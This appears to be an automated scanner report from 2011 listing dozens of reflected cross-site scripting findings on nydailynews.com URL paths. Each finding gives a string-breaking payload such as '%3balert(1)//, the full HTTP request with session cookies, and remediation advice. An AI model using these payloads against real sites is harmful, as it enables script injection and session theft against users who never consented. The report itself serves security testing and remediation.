This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossip/2011ce86e'%3b16f413446c/02/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:29 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70083
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef076'%3b8ae040c2ded was submitted in the REST URL parameter 3. This input was echoed as ef076';8ae040c2ded in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossip/2011/02ef076'%3b8ae040c2ded/08/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:25:50 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70082
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6aee'%3bde191b0538a was submitted in the REST URL parameter 4. This input was echoed as d6aee';de191b0538a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gossip/2011/02/08d6aee'%3bde191b0538a/ HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response (redirected)
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:26:10 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70082
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cccb'%3balert(1)//7bfbd00b88b was submitted in the REST URL parameter 1. This input was echoed as 1cccb';alert(1)//7bfbd00b88b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be970'%3balert(1)//fc28488475a was submitted in the REST URL parameter 2. This input was echoed as be970';alert(1)//fc28488475a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 84e8a'%3balert(1)//74b043193d was submitted in the REST URL parameter 3. This input was echoed as 84e8a';alert(1)//74b043193d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c22c4'%3balert(1)//37a4eaf8375 was submitted in the REST URL parameter 4. This input was echoed as c22c4';alert(1)//37a4eaf8375 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59ce9'%3balert(1)//5dc533d97c7 was submitted in the REST URL parameter 5. This input was echoed as 59ce9';alert(1)//5dc533d97c7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d914a'%3balert(1)//b55e1b0e6e4 was submitted in the REST URL parameter 1. This input was echoed as d914a';alert(1)//b55e1b0e6e4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imgd914a'%3balert(1)//b55e1b0e6e4/static/covers/backpage_cover.jpg?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:35 GMT Server: Apache Keep-Alive: timeout=3, max=1000 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70227
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63760'%3balert(1)//9e7c975ff5b was submitted in the REST URL parameter 2. This input was echoed as 63760';alert(1)//9e7c975ff5b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static63760'%3balert(1)//9e7c975ff5b/covers/backpage_cover.jpg?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:36 GMT Server: Apache Keep-Alive: timeout=3, max=994 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70227
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 601ad'%3balert(1)//5fa434a9ff5 was submitted in the REST URL parameter 3. This input was echoed as 601ad';alert(1)//5fa434a9ff5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers601ad'%3balert(1)//5fa434a9ff5/backpage_cover.jpg?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:36 GMT Server: Apache Keep-Alive: timeout=3, max=996 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70227
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a38bf'%3balert(1)//5afd0e5995f was submitted in the REST URL parameter 4. This input was echoed as a38bf';alert(1)//5afd0e5995f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers/backpage_cover.jpga38bf'%3balert(1)//5afd0e5995f?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:40 GMT Server: Apache Keep-Alive: timeout=3, max=998 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70227
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 318a4'%3balert(1)//cb18afc39fc was submitted in the REST URL parameter 1. This input was echoed as 318a4';alert(1)//cb18afc39fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img318a4'%3balert(1)//cb18afc39fc/static/covers/frontpage_cover.jpg?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:33 GMT Server: Apache Keep-Alive: timeout=3, max=995 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70228
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 80aa3'%3balert(1)//8c43150b43f was submitted in the REST URL parameter 2. This input was echoed as 80aa3';alert(1)//8c43150b43f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static80aa3'%3balert(1)//8c43150b43f/covers/frontpage_cover.jpg?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:36 GMT Server: Apache Keep-Alive: timeout=3, max=988 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70228
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e4b5'%3balert(1)//573159094b was submitted in the REST URL parameter 3. This input was echoed as 9e4b5';alert(1)//573159094b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers9e4b5'%3balert(1)//573159094b/frontpage_cover.jpg?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:41 GMT Server: Apache Keep-Alive: timeout=3, max=998 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70227
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97dfc'%3balert(1)//1819df3ce67 was submitted in the REST URL parameter 4. This input was echoed as 97dfc';alert(1)//1819df3ce67 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /img/static/covers/frontpage_cover.jpg97dfc'%3balert(1)//1819df3ce67?1297185846 HTTP/1.1 Host: www.nydailynews.com Proxy-Connection: keep-alive Referer: http://www.nydailynews.com/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296236506383:ss=1296236490305; sto-id-sg-web-8080=CBACAKAK; Zvents=1djug47bp7
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 17:24:50 GMT Server: Apache Keep-Alive: timeout=3, max=996 Connection: Keep-Alive Content-Type: text/html Content-Language: en Vary: Accept-encoding Content-Length: 70228
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e6ae4'%3balert(1)//a7bed429497 was submitted in the REST URL parameter 1. This input was echoed as e6ae4';alert(1)//a7bed429497 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96d71'%3balert(1)//a98bbdfe424 was submitted in the REST URL parameter 2. This input was echoed as 96d71';alert(1)//a98bbdfe424 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8445b'%3balert(1)//d52d15102e7 was submitted in the REST URL parameter 3. This input was echoed as 8445b';alert(1)//d52d15102e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2520b'%3balert(1)//a0925e886b4 was submitted in the REST URL parameter 4. This input was echoed as 2520b';alert(1)//a0925e886b4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1cc54'%3balert(1)//351f7f544e7 was submitted in the REST URL parameter 1. This input was echoed as 1cc54';alert(1)//351f7f544e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0835'%3balert(1)//899b818019e was submitted in the REST URL parameter 2. This input was echoed as b0835';alert(1)//899b818019e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d601e'%3balert(1)//ad5e9032c9e was submitted in the REST URL parameter 3. This input was echoed as d601e';alert(1)//ad5e9032c9e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff5d6'%3balert(1)//99a0e5c1246 was submitted in the REST URL parameter 4. This input was echoed as ff5d6';alert(1)//99a0e5c1246 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abc66'%3balert(1)//14705d4d725 was submitted in the REST URL parameter 1. This input was echoed as abc66';alert(1)//14705d4d725 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
